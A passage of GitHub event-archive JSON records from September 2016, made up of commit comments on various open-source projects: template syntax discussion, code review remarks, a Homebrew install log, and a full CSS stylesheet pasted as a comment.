theUl.stop().animate({left:distance1},300);\r\n\t\t\t        };\r\n\t\t\t\t}\r\n\t\t\t\ttbsc1=setInterval(sports1,moveTime1);\r\n\t\t\r\n\t}\r\nrollByEachPic($(\".sum1\"),$(\".next\"),(\".prev\"),4,5000);\r\n})\r\n\r\n//右侧侧边导航交互\r\n$(\".top\").click(function(){\r\n\t$(\"html,body\").animate({scrollTop:0},120)\r\n})\r\n\r\n"}},"created_at":"2016-09-13T08:24:59Z"}
{"id":"4554145945","type":"CommitCommentEvent","actor":{"login":"Gorash"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18997678,"position":null,"line":null,"path":null,"commit_id":"75f60f69416625713819c810d2da33db4dc0b06c","created_at":"2016-09-13T08:25:22Z","updated_at":"2016-09-13T08:25:22Z","body":"Server side we can add t-elif, actually the user can have a t-if and t-else on the same node. Server side the example describe by @amigrave is:\r\n\r\n<t t-if=\"condition1\">\r\n   foo\r\n</t>\r\n<t t-if=\"condition2\">\r\n   bar\r\n</t>\r\n<t t-else=\"\" t-if=\"condition3\">\r\n   baz\r\n</t>\r\n<t t-else=\"\">\r\n   qux\r\n</t>\r\n\r\nWe will see to have the same behavior."}},"created_at":"2016-09-13T08:25:22Z"}
{"id":"4554149090","type":"CommitCommentEvent","actor":{"login":"FredrIQ"},"repo":{"name":"roukaour/pokecrystal"},"payload":{"comment":{"id":18997684,"position":null,"line":null,"path":null,"commit_id":"01fc75e4bd3ece37c3e335a8e696255e3b5d1090","created_at":"2016-09-13T08:26:06Z","updated_at":"2016-09-13T08:26:06Z","body":"@ removing smashable rocks: unless you worsened the situation from the official GSC games, there is no reason to remove smashable rocks, as they're only useful for, well, smashing them (encounters, and, if you're going to potentially backport a HGSS feature, items)"}},"created_at":"2016-09-13T08:26:06Z"}
{"id":"4554149360","type":"CommitCommentEvent","actor":{"login":"NagyD"},"repo":{"name":"NagyD/SDLPoP"},"payload":{"comment":{"id":18997685,"position":null,"line":null,"path":null,"commit_id":"e53ceb87f05ccf807fa6db839495893d6f5bc8a2","created_at":"2016-09-13T08:26:10Z","updated_at":"2016-09-13T08:26:10Z","body":"What about replay files?"}},"created_at":"2016-09-13T08:26:10Z"}
{"id":"4554153680","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997693,"position":40,"line":130,"path":"src/game/AI/AggressorAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T08:27:07Z","updated_at":"2016-09-13T08:27:07Z","body":":+1: "}},"created_at":"2016-09-13T08:27:07Z"}
{"id":"4554156471","type":"CommitCommentEvent","actor":{"login":"rawlingsj"},"repo":{"name":"fabric8io/gofabric8"},"payload":{"comment":{"id":18997698,"position":83,"line":0,"path":"cmds/install.go","commit_id":"21c75937f024e615884973bbc2bdac7dee8d5897","created_at":"2016-09-13T08:27:42Z","updated_at":"2016-09-13T08:27:42Z","body":"I dont but the brew install does, here's a sample:\r\n\r\n```\r\nfabric8 recommends OSX users use the xhyve driver\r\n==> Downloading https://homebrew.bintray.com/bottles/docker-machine-driver-xhyve-0.2.3.el_capitan.bottle.tar.gz\r\nAlready downloaded: /Users/jamesrawlings/Library/Caches/Homebrew/docker-machine-driver-xhyve-0.2.3.el_capitan.bottle.tar.gz\r\n==> Pouring docker-machine-driver-xhyve-0.2.3.el_capitan.bottle.tar.gz\r\n==> Caveats\r\nThis driver requires superuser privileges to access the hypervisor. To\r\nenable, execute\r\n    sudo chown root:wheel $(brew --prefix)/opt/docker-machine-driver-xhyve/bin/docker-machine-driver-xhyve\r\n    sudo chmod u+s $(brew --prefix)/opt/docker-machine-driver-xhyve/bin/docker-machine-driver-xhyve\r\n==> Summary\r\n```"}},"created_at":"2016-09-13T08:27:42Z"}
{"id":"4554158127","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":18997705,"position":61,"line":142,"path":"src/game/AI/AggressorAI.cpp","commit_id":"5fab5ddc8722dee23a6a7af0726087979d298d1c","created_at":"2016-09-13T08:28:07Z","updated_at":"2016-09-13T08:28:07Z","body":"?"}},"created_at":"2016-09-13T08:28:07Z"}
{"id":"4554158233","type":"CommitCommentEvent","actor":{"login":"wilr"},"repo":{"name":"silvershop/silvershop-core"},"payload":{"comment":{"id":18997707,"position":null,"line":null,"path":null,"commit_id":"047bbdc7204556a9aa8f71de0efbc6723d75740f","created_at":"2016-09-13T08:28:08Z","updated_at":"2016-09-13T08:28:08Z","body":"So the use case for this a custom module (online subscriptions) didn't require payment Proceed with Payment didn't want to use Lang as I wasn't sure how defining a lang in a module would work..."}},"created_at":"2016-09-13T08:28:08Z"}
{"id":"4554160904","type":"CommitCommentEvent","actor":{"login":"cmbant"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":18997709,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-13T08:28:45Z","updated_at":"2016-09-13T08:28:45Z","body":"I can't see any reason why that loop would not be thread safe, can you? Do you get the same problem with both gfortran and ifort?"}},"created_at":"2016-09-13T08:28:45Z"}
{"id":"4554161269","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18997710,"position":null,"line":null,"path":null,"commit_id":"37e828c3e016d9c7105e22da76123017a2cdff48","created_at":"2016-09-13T08:28:49Z","updated_at":"2016-09-13T08:28:49Z","body":"I will try to re-extract vmaps and try again. Maybe there is an issue with my old vmaps version."}},"created_at":"2016-09-13T08:28:49Z"}
{"id":"4554161552","type":"CommitCommentEvent","actor":{"login":"alexara"},"repo":{"name":"processone/ejabberd"},"payload":{"comment":{"id":18997712,"position":null,"line":null,"path":null,"commit_id":"9a5f0751be9d012a6f16119556497456ab47da4f","created_at":"2016-09-13T08:28:53Z","updated_at":"2016-09-13T08:28:53Z","body":"Would you mind to reflect this change on the documentation? :-)\r\nhttps://docs.ejabberd.im/admin/guide/configuration/#mod_mam"}},"created_at":"2016-09-13T08:28:53Z"}
{"id":"4554173210","type":"CommitCommentEvent","actor":{"login":"itamarnet"},"repo":{"name":"funcoeszz/funcoeszz"},"payload":{"comment":{"id":18997728,"position":null,"line":null,"path":null,"commit_id":"687b2b89a01f045bc021ecc69a05fd279c9065da","created_at":"2016-09-13T08:31:21Z","updated_at":"2016-09-13T08:31:21Z","body":"Restabelendo também todos os testes."}},"created_at":"2016-09-13T08:31:21Z"}
{"id":"4554176408","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18997736,"position":null,"line":null,"path":null,"commit_id":"cc33dca925ed68dce42e5d77325b82fc164c25e3","created_at":"2016-09-13T08:32:00Z","updated_at":"2016-09-13T08:32:00Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32562/testReport/) for this commit**"}},"created_at":"2016-09-13T08:32:00Z"}
{"id":"4554176578","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":18997737,"position":152,"line":107,"path":"repos/os/src/server/input_merger/main.cc","commit_id":"136e4193f9b49bc5f141f7791f7ad419d4235f87","created_at":"2016-09-13T08:32:03Z","updated_at":"2016-09-13T08:32:03Z","body":"May we leave out the use of `strncpy`? In my opinion, the diagnostic info does not need to be super precise. Knowing that any input node is wrong will certainly be enough to spot the problem.\r\n\r\nIn general, let us not add new instances of C arrays in new code. Everytime I see a buffer like this I cannot help but see it overflowing.\r\n\r\nTo cover the use case you have here, we could add a `Xml_node::print` method."}},"created_at":"2016-09-13T08:32:03Z"}
{"id":"4554176848","type":"CommitCommentEvent","actor":{"login":"shai-xio"},"repo":{"name":"eliben/pycparser"},"payload":{"comment":{"id":18997738,"position":null,"line":null,"path":null,"commit_id":"749650a2e24051cdd6a7bfa803c03e0a5fa77103","created_at":"2016-09-13T08:32:07Z","updated_at":"2016-09-13T08:32:07Z","body":"Thanks!"}},"created_at":"2016-09-13T08:32:07Z"}
{"id":"4554179458","type":"CommitCommentEvent","actor":{"login":"smart09"},"repo":{"name":"smart09/4G"},"payload":{"comment":{"id":18997743,"position":null,"line":null,"path":null,"commit_id":"19204df0e43ceab0b5b40e75381401db659021b3","created_at":"2016-09-13T08:32:37Z","updated_at":"2016-09-13T08:32:37Z","body":"/* CSS Document */\r\nbody{\r\n  font:normal 12px/1.5 'Microsoft YaHei','\\5FAE\\8F6F\\96C5\\9ED1';\r\n  color:#333;\r\n}\r\nhtml{\r\n  color:#333;\r\n  background:#fff;\r\n}\r\nbody,ul,li,ol,div,dt,dl,dd,form,h1,h2,h3,h4,h5,h6,pre,button,p,cod,input,th,td,tr,atricle,footer,nav,section,em,span{\r\n  margin:0;\r\n  padding:0;\r\n}\r\nimg{\r\n  border:0;\r\n  vertical-align:top;\r\n}\r\na{\r\n  color:#333;\r\n  text-decoration:none;\r\n}\r\nul,li{\r\n  list-style:none;\r\n}\r\nh1,h2,h3,h4,h5,h6{\r\n  font-size:100%;\r\n  font-weight:500;\r\n}\r\naddress,caption,cite,code,dfn,em,th,var{\r\n  font-style:normal;\r\n  font-weight:500;\r\n}\r\n.fn-clear{\r\n  zoom:1;\r\n}\r\n.clear:after{\r\n  content:\".\";\r\n  display:block;\r\n  height:0;\r\n  clear:both;\r\n}\r\n.fn-clear:after{\r\n  visibility:hidden;\r\n  display:block;\r\n  font-size:0;\r\n  clear:both;\r\n  height:0;\r\n  content:\"\";\r\n}\r\ni,em{\r\n  display:inline-block;\r\n  font-style:normal;\r\n}\r\n.fl, .fr{\r\n  position:relative;\r\n}\r\n.fl{\r\n  float:left;\r\n}\r\n.fr{\r\n  float:right;\r\n}\r\ndiv{\r\n  display:block;\r\n}\r\n.clear{\r\n  clear:both;\r\n}\r\n.clearfix{\r\n}\r\na:hover{\r\n  text-decoration:underline;\r\n}\r\n.bg1{\r\n\tbackground: url(../img/1.png) no-repeat 50% 50%;\r\n\theight: 326px;\r\n}\r\n.bg2{\r\n\tbackground: url(../img/2.png) no-repeat 50% 50%;\r\n\theight: 349px;\r\n\tmargin-bottom: 60px;\r\n}\r\n.w1000{\r\n\twidth: 1000px;\r\n\tmargin: 0 auto;\r\n}\r\n.o{\r\n\toverflow: hidden;\r\n}\r\n.context{\r\n\twidth: 384px;\r\n\tmargin-left: 16px;\r\n\tline-height: 30px;\r\n\tpadding-top: 73px;\r\n\tbackground: url(../img/4G_tit17450.png) no-repeat;\r\n\ttext-indent: 20px;\r\n\tfont-size: 14px;\r\n\tcolor: #636363;\r\n\tfont-family: \"\\5B8B\\4F53\", Tahoma, Helvetica, san-serif;\r\n}\r\n.context a{\r\n\tcolor: #636363;\r\n\tfont-family: \"\\5B8B\\4F53\", Tahoma, Helvetica, san-serif;\r\n}\r\n.context a:hover{\r\n\tcolor: #f60;\r\n}\r\n.focus{\r\n\twidth: 457px;\r\n\theight: 290px;\r\n\tmargin-left: 76px;\r\n\tpadding: 16px 16px 33px;\r\n\tbackground: url(../img/4G_tit_rbg488355.png) no-repeat;\r\n}\r\n.focus .focus_con{\r\n\twidth: 450px;\r\n\theight: 290px;\r\n\tposition: relative;\r\n\toverflow: hidden;\r\n}\r\n.focus .focus_con ul{\r\n\tposition: absolute;\r\n\tleft: 0;\r\n\ttop: 0;\r\n\theight: 290px;\r\n\toverflow: hidden;\r\n}\r\n.focus .focus_con li{\r\n\tfloat: left;\r\n\theight: 290px;\r\n\tposition: relative;\r\n}\r\n.focus_con li img{\r\n\twidth: 450px;\r\n\theight: 290px;\r\n}\r\n.focus_con .dot{\r\n\twidth: 100%;\r\n\theight: 30px;\r\n\tline-height: 30px;\r\n\ttext-align: center;\r\n\tbackground-color: #636363;\r\n\topacity: 0.8;\r\n\tposition: absolute;\r\n\tleft: 0;\r\n\tbottom: 0;\r\n}\r\n.focus_con .dot span{\r\n\tdisplay: inline-block;\r\n\twidth: 10px;\r\n\theight: 10px;\r\n\tborder-radius: 50%;\r\n\tbackground-color: #fff;\r\n\tmargin-right: 8px;\r\n\tcursor: pointer;\r\n}\r\n.focus_con .dot span.active{\r\n\tbackground-color: #FF6600;\r\n}\r\n.mb50{\r\n\tmargin-bottom: 50px;\r\n}\r\n.bg3{\r\n\tbackground: url(../img/wz2.png) no-repeat 50% 50px;\r\n}\r\n.wrapper{\r\n\twidth: 100%;\r\n\tbackground: url(../img/bg1.png) repeat-x;\r\n\theight: 637px;\r\n}\r\n.bg4{\r\n\tbackground: url(../img/wz1.png) no-repeat 50% 67px;\r\n\theight: 295px;\r\n}\r\n.w962{\r\n\twidth: 962px;\r\n\tmargin: 0 auto;\r\n}\r\n.w962 ul{\r\n\twidth: 962px;\r\n}\r\n.w962 li{\r\n\twidth: 73px;\r\n\tposition: relative;\r\n\tmargin-right: 1px;\r\n\tfloat: left;\r\n\theight: 65px;\r\n\tcursor: pointer;\r\n\tbackground: url(../img/xx.jpg) 0 50% repeat-x;\r\n}\r\n.w962 li.show{\r\n\tbackground: url(../img/xx1.jpg) 0 50% repeat-x !important;\r\n}\r\n.timer, .timer1{\r\n\tfont-size: 14px;\r\n\tfont-family: \"\\5FAE\\8F6F\\96C5\\9ED1\";\r\n\tcolor: #FFFFFF;\r\n\tline-height: 20px;\r\n\tposition: absolute;\r\n\tleft: 5px;\r\n\ttop: 0;\r\n\tz-index: 3;\r\n}\r\n.jiao_t{\r\n\tposition: absolute;\r\n\tleft: 57px;\r\n\ttop: 23px;\r\n\tdisplay: inline-block;\r\n\tborder: 6px solid #ffc973;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-top: 0;\r\n\twidth: 0;\r\n\theight: 0;\r\n\tline-height: 0;\r\n\tfont-size: 0;\r\n}\r\n.w962 li.show .jiao_t{\r\n\tborder: 6px solid #FFFFFF;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-top: 0;\r\n}\r\n.jiao_b{\r\n\tposition: absolute;\r\n\tleft: 57px;\r\n\tbottom: 22px;\r\n\tdisplay: inline-block;\r\n\tborder: 6px solid #ffc973;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-bottom: 0;\r\n\twidth: 0;\r\n\theight: 0;\r\n\tline-height: 0;\r\n\tfont-size: 0;\r\n}\r\n.w962 li.show .jiao_b{\r\n\tborder: 6px solid #FFFFFF;\r\n\tborder-left: 6px solid #4463b3;\r\n\tborder-right: 6px solid #4463b3;\r\n\tborder-bottom: 0;\r\n}\r\n.txt_bg, .txt_bg1{\r\n\tbackground: url(../img/bg.png) no-repeat;\r\n\twidth: 120px;\r\n\theight: 126px;\r\n\tpadding: 28px 20px 61px 19px;\r\n\tfont-size: 12px;\r\n\tline-height: 18px;\r\n\tcolor: #a7a7a7;\r\n\tfont-family: arial;\r\n\tposition: absolute;\r\n\tleft: -21px;\r\n\ttop: -198px;\r\n\tdisplay: none;\r\n}\r\n.w962 li.show div.c{\r\n\tdisplay: block;\r\n}\r\n.txt_bg1{\r\n\tbackground: url(../img/timer_bg.png) no-repeat;\r\n\tleft: -21px;\r\n\tpadding: 56px 20px 33px 19px;\r\n\tleft: -22px;\r\n\ttop: 52px;\r\n}\r\n.txt_bg a, .txt_bg1 a{\r\n\tcolor: #a7a7a7;\r\n}\r\n.txt_bg a:hover, .txt_bg1 a:hover{\r\n\tcolor: #FF6600;\r\n}\r\n.w_con{\r\n\tmargin-top: 220px;\r\n}\r\n.w_con ul{\r\n\toverflow: hidden;\r\n}\r\n.w_con li{\r\n\tfloat: left;\r\n\twidth: 240px;\r\n\theight: 325px;\r\n\tpadding: 18px 18px 28px;\r\n\tmargin: 0 20px 0 33px;\r\n\tbackground: url(../img/list_bg.png) no-repeat;\r\n}\r\n.wrapper2{\r\n\twidth: 100%;\r\n\tbackground: url(../img/bg2.png) repeat-x;\r\n\theight: 736px;\r\n\tmargin-top: 40px;\r\n}\r\n.bg5{\r\n\tbackground: url(../img/wz3.png) no-repeat 50% 72px;\r\n\tpadding: 245px 0 0 0;\r\n}\r\n.change_con{\r\n\twidth: 1000px;\r\n\tposition: relative;\r\n\toverflow: hidden;\r\n}\r\n.c_bigpic{\r\n\twidth: 430px;\r\n\tmargin: 0 30px 0 40px;\r\n}\r\n.c_bigpic .h244{\r\n\twidth: 430px;\r\n\theight: 244px;\r\n\toverflow: hidden;\r\n}\r\n.bei14b, .bei14b a{\r\n\tfont-size: 14px;\r\n\tline-height: 32px;\r\n\tcolor: #f3f3f3;\r\n\tfont-weight: bold;\r\n\tdisplay: block;\r\n\tmargin: 10px 0;\r\n}\r\n.bei14b a:hover{\r\n\tcolor: #FF6600;\r\n}\r\n.bei14{\r\n\tline-height: 22px;\r\n\tcolor: #F3F3F3;\r\n\tfont-size: 14px;\r\n\tvertical-align: top;\r\n}\r\n.c_spicbox{\r\n\twidth: 480px;\r\n}\r\n.c_spicbox .c_spic_con{\r\n\theight: 180px;\r\n\tmargin-bottom: 32px;\r\n\toverflow: hidden;\r\n}\r\n.c_spic{\r\n\twidth: 240px;\r\n\theight: 180px;\r\n\tmargin-right: 10px;\r\n\tfloat: left;\r\n}\r\n.orange{\r\n\tcolor: #FF6600;\r\n}\r\n.orange:hover{\r\n\tcolor: #FF3333;\r\n}\r\n.bg6{\r\n\tbackground: url(../img/wz4.png) no-repeat 50% 65px;\r\n}\r\n.w_con2{\r\n\theight: 278px;\r\n\tpadding-top: 220px;\r\n\tposition: relative;\r\n\toverflow: hidden;\r\n}\r\n.w_con2 ul{\r\n\tposition: absolute;\r\n\toverflow: hidden;\r\n\twidth: auto;\r\n\theight: 278px;\r\n}\r\n.w_con2_pic{\r\n\twidth: 866px;\r\n\theight: 278px;\r\n\tmargin-left: 61px;\r\n\toverflow: hidden;\r\n\tposition: relative;\r\n}\r\n.w_con2_pic li{\r\n\tfloat: left;\r\n\twidth: 194px;\r\n\theight: 278px;\r\n\tmargin-right: 30px;\r\n\toverflow: hidden;\r\n}\r\n.w_con2_pic li img{\r\n\twidth: 192px;\r\n\theight: 276px;\r\n\tborder: 1px solid #e3e3e3;\r\n}\r\n.c_btn{\r\n\tdisplay: inline-block;\r\n\twidth: 24px;\r\n\theight: 278px;\r\n\tbackground: url(../img/tou.png) no-repeat;\r\n\tposition: absolute;\r\n\ttop:220px;\r\n}\r\n.prev{\r\n\tleft: 0;\r\n}\r\n.next{\r\n\tright: 0;\r\n\tbackground-position: -25px 0;\r\n}\r\n.prev:hover{\r\n\tbackground-position: -52px 0;\r\n}\r\n.next:hover{\r\n\tbackground-position: -76px 0;\r\n}\r\n.dw{\r\n\tmargin: 40px 68px 70px 38px;\r\n}\r\n.dw_con{\r\n\twidth: 410px;\r\n\tfloat: left;\r\n}\r\n.dw_con h2{\r\n\tfont-size: 20px;\r\n\tfont-family:\"microsoft yahei\";\r\n\theight: 38px;\r\n\tline-height: 38px;\r\n\tmargin-bottom: 5px;\r\n}\r\n.dw_con h2 a{\r\n\tcolor: #4463B3;\r\n\ttext-decoration: underline;\r\n}\r\n.dw_con p{\r\n\tfont-size: 12px;\r\n\tcolor: #666666;\r\n\tline-height: 24px;\r\n\tfont-family: arial;\r\n}\r\n.dw_con .spic{\r\n\tmargin-top: 13px;\r\n}\r\n.dw_con .spic img{\r\n\twidth: 406px;\r\n\theight: 222px;\r\n}\r\n.dw_con .bigpic{\r\n\twidth: 426px;\r\n\theight: 422px;\r\n}\r\n.bg7{\r\n\tbackground: url(../img/wz5.png) no-repeat 50% 72px;\r\n\tpadding: 245px 0 0 0;\r\n}\r\n.say{\r\n\tmargin: 0 40px;\r\n\toverflow: hidden;\r\n}\r\n.s_list{\r\n\twidth: 365px;\r\n\theight: 92px;\r\n\tpadding: 10px 12px 10px 13px;\r\n\tmargin-bottom: 30px;\r\n\tbackground-color: #FFFFFF;\r\n}\r\n.s_list .s_item .s_pic{\r\n\twidth: 92px;\r\n\theight: 92px;\r\n\tfloat: left;\r\n\tmargin-right: 15px;\r\n\toverflow: hidden;\r\n}\r\n.s_list .s_item .s_pic1{\r\n\tfloat: right;\r\n\tmargin-left: 15px;\r\n\tmargin-right: 0;\r\n}\r\n.s_list .s_item  img{\r\n\twidth: 92px;\r\n\theight: 92px;\r\n}\r\n.s_list .s_item h2{\r\n\tfont-family: arial;\r\n\theight: 20px;\r\n\tline-height: 20px;\r\n\tpadding: 3px 0;\r\n\tfont-weight: bold;\r\n}\r\n.s_list .s_item h2 a{\r\n\tcolor: #6f6f6f;\r\n}\r\n.s_list .s_item p{\r\n\tline-height: 18px;\r\n\tcolor: #6f6f6f;\r\n\tfont-family: arial;\r\n}\r\n.s_txt{\r\n\twidth: 254px;\r\n\theight: 92px;\r\n\toverflow: hidden;\r\n}\r\n.bg8{\r\n\tbackground: url(../img/wz6.png) no-repeat 50% 60px;\r\n}\r\n.w_con3{\r\n\tmargin-top: 255px;\r\n\toverflow: hidden;\r\n}\r\n.silder-navbox{\r\n\tposition: fixed;\r\n\tleft: 50%;\r\n\tbottom: 120px;\r\n\twidth: 129px;\r\n\theight: 369px;\r\n\tmargin-left: 510px;\r\n\tbackground: url(../img/pf1.png) no-repeat;\r\n\tz-index: 9999;\r\n}\r\n.silder-nav{\r\n\tmargin-top: 91px;\r\n\theight: 202px;\r\n}\r\n.silder-nav a{\r\n\tdisplay: block;\r\n\theight: 32px;\r\n\tline-height: 32px;\r\n\tfont-size: 14px;\r\n\tcolor: #FFFFFF;\r\n\ttext-align: center;\r\n}\r\n.silder-nav a:hover{\r\n\tcolor: #FF6600;\r\n\ttext-decoration: none;\r\n}\r\n.top{\r\n\twidth: 42px;\r\n\theight: 42px;\r\n\tdisplay: block;\r\n\tmargin-left: 39px;\r\n}"}},"created_at":"2016-09-13T08:32:37Z"}
{"id":"4554179682","type":"CommitCommentEvent","actor":{"login":"crazymaster"},"repo":{"name":"vim-jp/lang-ja"},"payload":{"comment":{"id":18997744,"position":null,"line":null,"path":null,"commit_id":"84bd63d8131fd80f808737648ab4134f0d420915","created_at":"2016-09-13T08:32:41Z","updated_at":"2016-09-13T08:32:41Z","body":"https://github.com/vim/vim/commit/b56e7ff0dbbfa85361bdbc5b4a86ff8b57a7acbb#diff-a5299d4321eec87e0ed0905edef47497"}},"created_at":"2016-09-13T08:32:41Z"}
{"id":"4554181009","type":"CommitCommentEvent","actor":{"login":"JONGJONGJONG"},"repo":{"name":"JONGJONGJONG/JONG_JSP"},"payload":{"comment":{"id":18997745,"position":null,"line":null,"path":null,"commit_id":"102ba769aa75b254ca6dbe108ac9b57c0fe3822a","created_at":"2016-09-13T08:32:58Z","updated_at":"2016-09-13T08:32:58Z","body":"안녕 내 이름은 종헌 이렇게 만드는 거 맞나?"}},"created_at":"2016-09-13T08:32:58Z"}
{"id":"4554181198","type":"CommitCommentEvent","actor":{"login":"MattiaFortunati"},"repo":{"name":"MattiaFortunati/glitchicken"},"payload":{"comment":{"id":18997746,"position":768,"line":768,"path":"src/js/game.js","commit_id":"a03e21adca1cac4cda395237cbd429a066911cba","created_at":"2016-09-13T08:33:01Z","updated_at":"2016-09-13T08:33:01Z","body":"hahah Thank you! :D"}},"created_at":"2016-09-13T08:33:01Z"}
{"id":"4554182424","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18997749,"position":null,"line":null,"path":null,"commit_id":"94e95a2bcb157657ce09e241386a0f526059ee0c","created_at":"2016-09-13T08:33:17Z","updated_at":"2016-09-13T08:33:17Z","body":"@wiewioraseb can you update @angularclass/hmr to 1.2.1"}},"created_at":"2016-09-13T08:33:17Z"}
{"id":"4554183901","type":"CommitCommentEvent","actor":{"login":"ehmry"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":18997753,"position":152,"line":107,"path":"repos/os/src/server/input_merger/main.cc","commit_id":"136e4193f9b49bc5f141f7791f7ad419d4235f87","created_at":"2016-09-13T08:33:35Z","updated_at":"2016-09-13T08:33:35Z","body":"Yes, I would prefer a print method, I will commit to reorder ahead of this."}},"created_at":"2016-09-13T08:33:35Z"}
{"id":"4554185117","type":"CommitCommentEvent","actor":{"login":"thisiscam"},"repo":{"name":"jiaqimeng/Berkeley-SchedulePinner"},"payload":{"comment":{"id":18997758,"position":null,"line":null,"path":null,"commit_id":"36bd0e9df9e9a44f1c04e9c5b2d717bd27b42967","created_at":"2016-09-13T08:33:50Z","updated_at":"2016-09-13T08:33:50Z","body":":)"}},"created_at":"2016-09-13T08:33:50Z"}
{"id":"4554191263","type":"CommitCommentEvent","actor":{"login":"hjoliver"},"repo":{"name":"oliver-sanders/cylc-tutorial"},"payload":{"comment":{"id":18997770,"position":12,"line":399,"path":"intro-section.tex","commit_id":"be4e1b7cb49ae0093361bbca0e794602f52ad397","created_at":"2016-09-13T08:35:12Z","updated_at":"2016-09-13T08:35:12Z","body":"Oops, I guess didn't extend the new \"syntax-driven line continuation\" to '&'. \r\nI'd indent left (less) to avoid the continuation, but no biggie.\r\n"}},"created_at":"2016-09-13T08:35:12Z"}
{"id":"4554191755","type":"CommitCommentEvent","actor":{"login":"bummzack"},"repo":{"name":"silvershop/silvershop-core"},"payload":{"comment":{"id":18997773,"position":null,"line":null,"path":null,"commit_id":"047bbdc7204556a9aa8f71de0efbc6723d75740f","created_at":"2016-09-13T08:35:18Z","updated_at":"2016-09-13T08:35:18Z","body":"I agree that modules should not override translations of other modules. I think the proper way here would be to have a custom CheckoutForm in the module… then inject your custom form in the module config. \r\n\r\nThere are also plenty of extension hooks (for the different checkout steps) that would allow modification of the form. We could even consider adding another hook to \"CheckoutForm\" itself…"}},"created_at":"2016-09-13T08:35:18Z"}
{"id":"4554192137","type":"CommitCommentEvent","actor":{"login":"weiss"},"repo":{"name":"processone/ejabberd"},"payload":{"comment":{"id":18997774,"position":null,"line":null,"path":null,"commit_id":"9a5f0751be9d012a6f16119556497456ab47da4f","created_at":"2016-09-13T08:35:22Z","updated_at":"2016-09-13T08:35:22Z","body":"> Would you mind to reflect this change on the documentation? :-)\r\n\r\nI submitted the corresponding [documentation update][1] back then, but didn't ask for publishing it yet, as this change is not yet released (16.08 doesn't have it).\r\n\r\n[1]: https://github.com/processone/docs.ejabberd.im/commit/7817b209b8f0ec04745a481570ac475eea1f6fbd"}},"created_at":"2016-09-13T08:35:22Z"}
{"id":"4554192485","type":"CommitCommentEvent","actor":{"login":"okapia"},"repo":{"name":"danielshahaf/parseable-dash-dash-help"},"payload":{"comment":{"id":18997776,"position":null,"line":null,"path":null,"commit_id":"8c21c2025c0eefaa3dbbabb58530c6c14078cca2","created_at":"2016-09-13T08:35:26Z","updated_at":"2016-09-13T08:35:26Z","body":"Would it necessarily need to be \"generated\"? For many commands, a static file might be sufficient."}},"created_at":"2016-09-13T08:35:26Z"}
{"id":"4554193569","type":"CommitCommentEvent","actor":{"login":"Hummel95"},"repo":{"name":"zero334/G19SystemMonitor"},"payload":{"comment":{"id":18997780,"position":null,"line":null,"path":null,"commit_id":"361d8bf92c0f1e2bcb2621b4a65080c31ac0be50","created_at":"2016-09-13T08:35:39Z","updated_at":"2016-09-13T08:35:39Z","body":"Hi zero, nice to see some developement for G19 keyboard going on!\r\nHave you seen this? https://github.com/linkdata/LCDHost \r\nMight save you some work!"}},"created_at":"2016-09-13T08:35:39Z"}
{"id":"4554195033","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18997783,"position":4,"line":28,"path":"std/Math.hx","commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-13T08:35:59Z","updated_at":"2016-09-13T08:35:59Z","body":"What about Math.random?"}},"created_at":"2016-09-13T08:35:59Z"}
{"id":"4554196559","type":"CommitCommentEvent","actor":{"login":"jprellberg"},"repo":{"name":"jprellberg/angular-apt"},"payload":{"comment":{"id":18997786,"position":73,"line":148,"path":"src/main/java/api/modules/ModuleRunner.java","commit_id":"8f010cf51e9a1df058c043ee051e2729847e9648","created_at":"2016-09-13T08:36:20Z","updated_at":"2016-09-13T08:36:20Z","body":"I am well aware. However I see no other way to go about it, this is simply how Java works. I will have to check all APT modules and make sure they behave correctly."}},"created_at":"2016-09-13T08:36:20Z"}
{"id":"4554200154","type":"CommitCommentEvent","actor":{"login":"Psycojoker"},"repo":{"name":"YunoHost/SSOwat"},"payload":{"comment":{"id":18997791,"position":14,"line":51,"path":"helpers.lua","commit_id":"2f4fcd394a5cd3db27ea6f7776b0481571e0d681","created_at":"2016-09-13T08:37:08Z","updated_at":"2016-09-13T08:37:08Z","body":"Looking at it I also doubt that this is a cryptographically secure random function.\r\n\r\nAfter some googling we should probably read instead on `/dev/urandom` or something like LuaCrypto (seems dead) or lua-openssl https://github.com/zhaozg/lua-openssl"}},"created_at":"2016-09-13T08:37:08Z"}
{"id":"4554200445","type":"CommitCommentEvent","actor":{"login":"HerringtonDarkholme"},"repo":{"name":"baixing/baicons"},"payload":{"comment":{"id":18997792,"position":9,"line":5,"path":"baicons2.css","commit_id":"4ac54c4551e5371ffffe93ab8896f47544e6bb0b","created_at":"2016-09-13T08:37:12Z","updated_at":"2016-09-13T08:37:12Z","body":"这个是闷声发大财\r\n076对老版也要改的"}},"created_at":"2016-09-13T08:37:12Z"}
